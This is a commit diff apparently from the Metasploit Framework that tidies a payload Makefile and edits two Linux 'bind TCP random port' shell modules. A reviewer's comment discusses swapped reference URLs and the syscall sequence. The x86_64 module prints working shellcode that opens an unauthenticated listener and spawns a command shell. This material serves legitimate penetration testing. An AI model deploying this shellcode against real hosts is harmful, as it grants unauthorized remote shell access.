Merge pull request #1 from todb-r7/pr2350-fix-random-bind-port-shellcode
Fixes for #2350, random bind shellcode
bug/bundler_fix
commit
81d82a77e8
|
@ -1,11 +1,11 @@
|
|||
STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind_icmp \
|
||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||
stager_egghunt stager_sock_find stager_sock_reverse \
|
||||
stager_sock_reverse_icmp stager_sock_reverse_udp \
|
||||
stager_sock_reverse_udp_dns
|
||||
STAGES=stage_tcp_shell stage_udp_shell
|
||||
SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
|
||||
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
||||
single_shell_bind_tcp_random_port
|
||||
single_reverse_tcp_shell single_reverse_udp_shell single_exec \
|
||||
single_shell_bind_tcp_random_port
|
||||
|
||||
OBJS=${STAGERS} ${STAGES} ${SINGLE}
|
||||
|
||||
|
@ -38,11 +38,11 @@ all: $(SINGLE) $(STAGES) $(STAGERS)
|
|||
@ruby -p -a -e ' \
|
||||
$$F.shift; \
|
||||
$$F[0].tap { |s| \
|
||||
s.tr! "A-F", "a-f"; \
|
||||
t=s.dup; \
|
||||
s.clear; \
|
||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||
s.tr! "A-F", "a-f"; \
|
||||
t=s.dup; \
|
||||
s.clear; \
|
||||
s<<("\""+t.scan(/../).map{|b|"\\x#{b}"}.join+"\"").ljust(23); \
|
||||
STDIN.eof? ? s<< " # " : s<< "+# "; \
|
||||
}; \
|
||||
$$_ = $$F.join(" ") + "\n"; \
|
||||
' < $*.tmp > $@
|
||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
|||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
||||
'Assembly source: http://goo.gl/TAveVc',
|
||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
||||
'Description' => %q{
|
||||
Listen for a connection in a random port and spawn a command shell.
|
||||
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||
},
|
||||
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86_64,
|
||||
'Payload' =>
|
||||
|
@ -31,21 +33,21 @@ module Metasploit3
|
|||
"\x6a\x02" +# pushq $0x2
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x29" +# mov $0x29,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x52" +# push %rdx
|
||||
"\x5e" +# pop %rsi
|
||||
"\x50" +# push %rax
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x32" +# mov $0x32,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\xb0\x2b" +# mov $0x2b,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x57" +# push %rdi
|
||||
"\x5e" +# pop %rsi
|
||||
"\x48\x97" +# xchg %rax,%rdi
|
||||
"\xff\xce" +# dec %esi
|
||||
"\xb0\x21" +# mov $0x21,%al
|
||||
"\x0f\x05" +# syscall
|
||||
"\x0f\x05" +# syscall
|
||||
"\x75\xf8" +# jne 40009f
|
||||
"\x52" +# push %rdx
|
||||
"\x48\xbf\x2f\x2f\x62" +# movabs $0x68732f6e69622f2f,%rdi
|
||||
|
@ -54,7 +56,7 @@ module Metasploit3
|
|||
"\x54" +# push %rsp
|
||||
"\x5f" +# pop %rdi
|
||||
"\xb0\x3b" +# mov $0x3b,%al
|
||||
"\x0f\x05" # syscall
|
||||
"\x0f\x05" # syscall
|
||||
}
|
||||
))
|
||||
end
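Review bot: The 'References' URL added to this ARCH_X86_64 module names tiny_shell_bind_tcp_random_port.asm, while the sibling x86 module further down (ARCH_X86) cites shell_bind_tcp_random_port_x86_64.asm — the two look swapped, so confirm against the upstream repository and exchange them if so. The new description also tells operators to run `nmap -sS target -p-`, but the syscalls visible in the payload hunk are socket, listen, accept, dup2 and execve (0x29, 0x32, 0x2b, 0x21, 0x3b) with no bind() in between, so the port is presumably auto-assigned by the kernel at listen() time from the target's ephemeral range (net.ipv4.ip_local_port_range, by default 32768-60999 on current kernels); the hint could say so, e.g. `Use nmap to discover the open port, which the kernel picks from the target's ephemeral port range: 'nmap -sS target -p-'.` It is also worth stating in the description that the listener is unauthenticated, so whoever reaches the port first gets the shell. The first instructions of the payload string start outside the hunk.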
|
||||
|
|
|
@ -15,11 +15,13 @@ module Metasploit3
|
|||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux Command Shell, Bind TCP Random Port Inline',
|
||||
'Description' => 'Listen for a connection in a random port and spawn a command shell. ' \
|
||||
'Use nmap to discover the open port: \'nmap -sS target -p-\'. ' \
|
||||
'Assembly source: http://goo.gl/V5OObo',
|
||||
'Author' => 'Geyslan G. Bem <geyslan@gmail.com>',
|
||||
'Description' => %q{
|
||||
Listen for a connection in a random port and spawn a command shell.
|
||||
Use nmap to discover the open port: 'nmap -sS target -p-'.
|
||||
},
|
||||
'Author' => 'Geyslan G. Bem <geyslan[at]gmail.com>',
|
||||
'License' => BSD_LICENSE,
|
||||
'References' => ['URL', 'https://github.com/geyslan/SLAE/blob/master/improvements/shell_bind_tcp_random_port_x86_64.asm'],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Payload' =>
|
||||
|
|